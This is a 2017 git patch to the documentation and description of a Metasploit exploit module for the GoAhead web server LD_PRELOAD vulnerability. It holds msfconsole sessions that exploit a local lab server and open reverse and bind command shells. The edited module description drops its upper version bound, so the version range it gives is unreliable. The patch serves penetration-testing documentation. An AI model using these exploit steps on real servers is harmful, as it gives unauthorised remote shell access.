From eb696ee5cfdd608eec809762853195fd9947bb8a Mon Sep 17 00:00:00 2001 From: HD Moore Date: Thu, 28 Dec 2017 16:30:04 -0600 Subject: [PATCH] Documentation update --- .../exploit/linux/http/goahead_ldpreload.md | 91 +++++++++++++++---- .../exploits/linux/http/goahead_ldpreload.rb | 2 +- 2 files changed, 74 insertions(+), 19 deletions(-) diff --git a/documentation/modules/exploit/linux/http/goahead_ldpreload.md b/documentation/modules/exploit/linux/http/goahead_ldpreload.md index 168b43fa6b..d36f7159f1 100644 --- a/documentation/modules/exploit/linux/http/goahead_ldpreload.md +++ b/documentation/modules/exploit/linux/http/goahead_ldpreload.md @@ -16,7 +16,7 @@ git checkout tags/v3.6.4 -q make > /dev/null cd test gcc ./cgitest.c -o cgi-bin/cgitest -sudo ../build/linux-x64-default/bin/goahead +../build/linux-x64-default/bin/goahead . 127.1.1.1:8080 ``` ## Verification Steps @@ -25,7 +25,7 @@ sudo ../build/linux-x64-default/bin/goahead 1. Install the application 2. Start msfconsole - 3. Do: ```use exploit/linux/http/goahead_cgi_exec``` + 3. Do: ```use exploit/linux/http/goahead_ldpreload``` 4. Do: ```set rhost [ip]``` 5. Do: ```exploit``` 6. You should get a shell. @@ -41,21 +41,76 @@ sudo ../build/linux-x64-default/bin/goahead ### GoAhead 3.6.4 on Ubuntu 16.04 x64 ``` -[*] Processing goahead.rc for ERB directives. -resource (goahead.rc)> use exploit/linux/http/goahead_cgi_exec -resource (goahead.rc)> set verbose true -verbose => true -resource (goahead.rc)> set rhost 127.1.1.1 -rhost => 127.1.1.1 -resource (goahead.rc)> check - -resource (goahead.rc)> exploit -[*] Started reverse TCP handler on 127.1.1.1:4444 -[*] Sending Exploit to /cgi-bin/cgitest -[*] Command shell session 1 opened (127.1.1.1:4444 -> 127.1.1.1:45762) at 2017-12-23 17:12:39 -0500 -uname -a -Linux goahead 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux -whoami -root +msf> use exploit/linux/http/goahead_preload +msf exploit(goahead_ldpreload) > set RHOST 127.1.1.1 +msf exploit(goahead_ldpreload) > set RPORT 8080 +msf exploit(goahead_ldpreload) > check + +[*] Searching 390 paths for an exploitable CGI endpoint... +[+] Exploitable CGI located at /cgi-bin/cgitest +[+] 127.1.1.1:8080 The target is vulnerable. + +msf exploit(goahead_ldpreload) > exploit + +[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress? +[*] Started reverse TCP handler on 127.0.0.1:4444 +[*] Searching 390 paths for an exploitable CGI endpoint... +[+] Exploitable CGI located at /cgi-bin/cgitest +[*] Command shell session 4 opened (127.0.0.1:4444 -> 127.0.0.1:32988) at 2017-12-28 16:26:50 -0600 + +uname -a +Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux +exit + +msf exploit(goahead_ldpreload) > set TARGET 1 +msf exploit(goahead_ldpreload) > unset PAYLOAD +msf exploit(goahead_ldpreload) > exploit + +[*] Started bind handler +[*] Searching 390 paths for an exploitable CGI endpoint... +[+] Exploitable CGI located at /cgi-bin/cgitest +[*] Command shell session 5 opened (127.0.0.1:30836 -> 127.1.1.1:4444) at 2017-12-28 16:28:04 -0600 + +uname -a +Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux +exit + +msf exploit(goahead_ldpreload) > set TARGET 2 +msf exploit(goahead_ldpreload) > unset PAYLOAD +msf exploit(goahead_ldpreload) > exploit + +[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress? +[*] Started reverse TCP double handler on 127.0.0.1:4444 +[*] Searching 390 paths for an exploitable CGI endpoint... +[+] Exploitable CGI located at /cgi-bin/cgitest +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo sNRXNjxWl7ic0uWw; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket B +[*] B: "sNRXNjxWl7ic0uWw\r\n" +[*] Matching... +[*] A is input... +[*] Command shell session 6 opened (127.0.0.1:4444 -> 127.0.0.1:32995) at 2017-12-28 16:28:56 -0600 + +uname -a +Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux + + +msf exploit(goahead_ldpreload) > set TARGET 4 +msf exploit(goahead_ldpreload) > unset PAYLOAD +msf exploit(goahead_ldpreload) > exploit + +[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress? +[*] Started reverse TCP handler on 127.0.0.1:4444 +[*] Searching 390 paths for an exploitable CGI endpoint... +[+] Exploitable CGI located at /cgi-bin/cgitest +[*] Command shell session 7 opened (127.0.0.1:4444 -> 127.0.0.1:33000) at 2017-12-28 16:29:34 -0600 + +uname -a +Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux + ``` diff --git a/modules/exploits/linux/http/goahead_ldpreload.rb b/modules/exploits/linux/http/goahead_ldpreload.rb index bc4e633d62..e4c73b6b28 100644 --- a/modules/exploits/linux/http/goahead_ldpreload.rb +++ b/modules/exploits/linux/http/goahead_ldpreload.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'GoAhead Web Server LD_PRELOAD Arbitrary Module Load', 'Description' => %q{ This module triggers an arbitrary shared library load vulnerability - in GoAhead web server versions prior to 3.6.5 that have the CGI module + in GoAhead web server versions between 2.5 and that have the CGI module enabled. }, 'Author' =>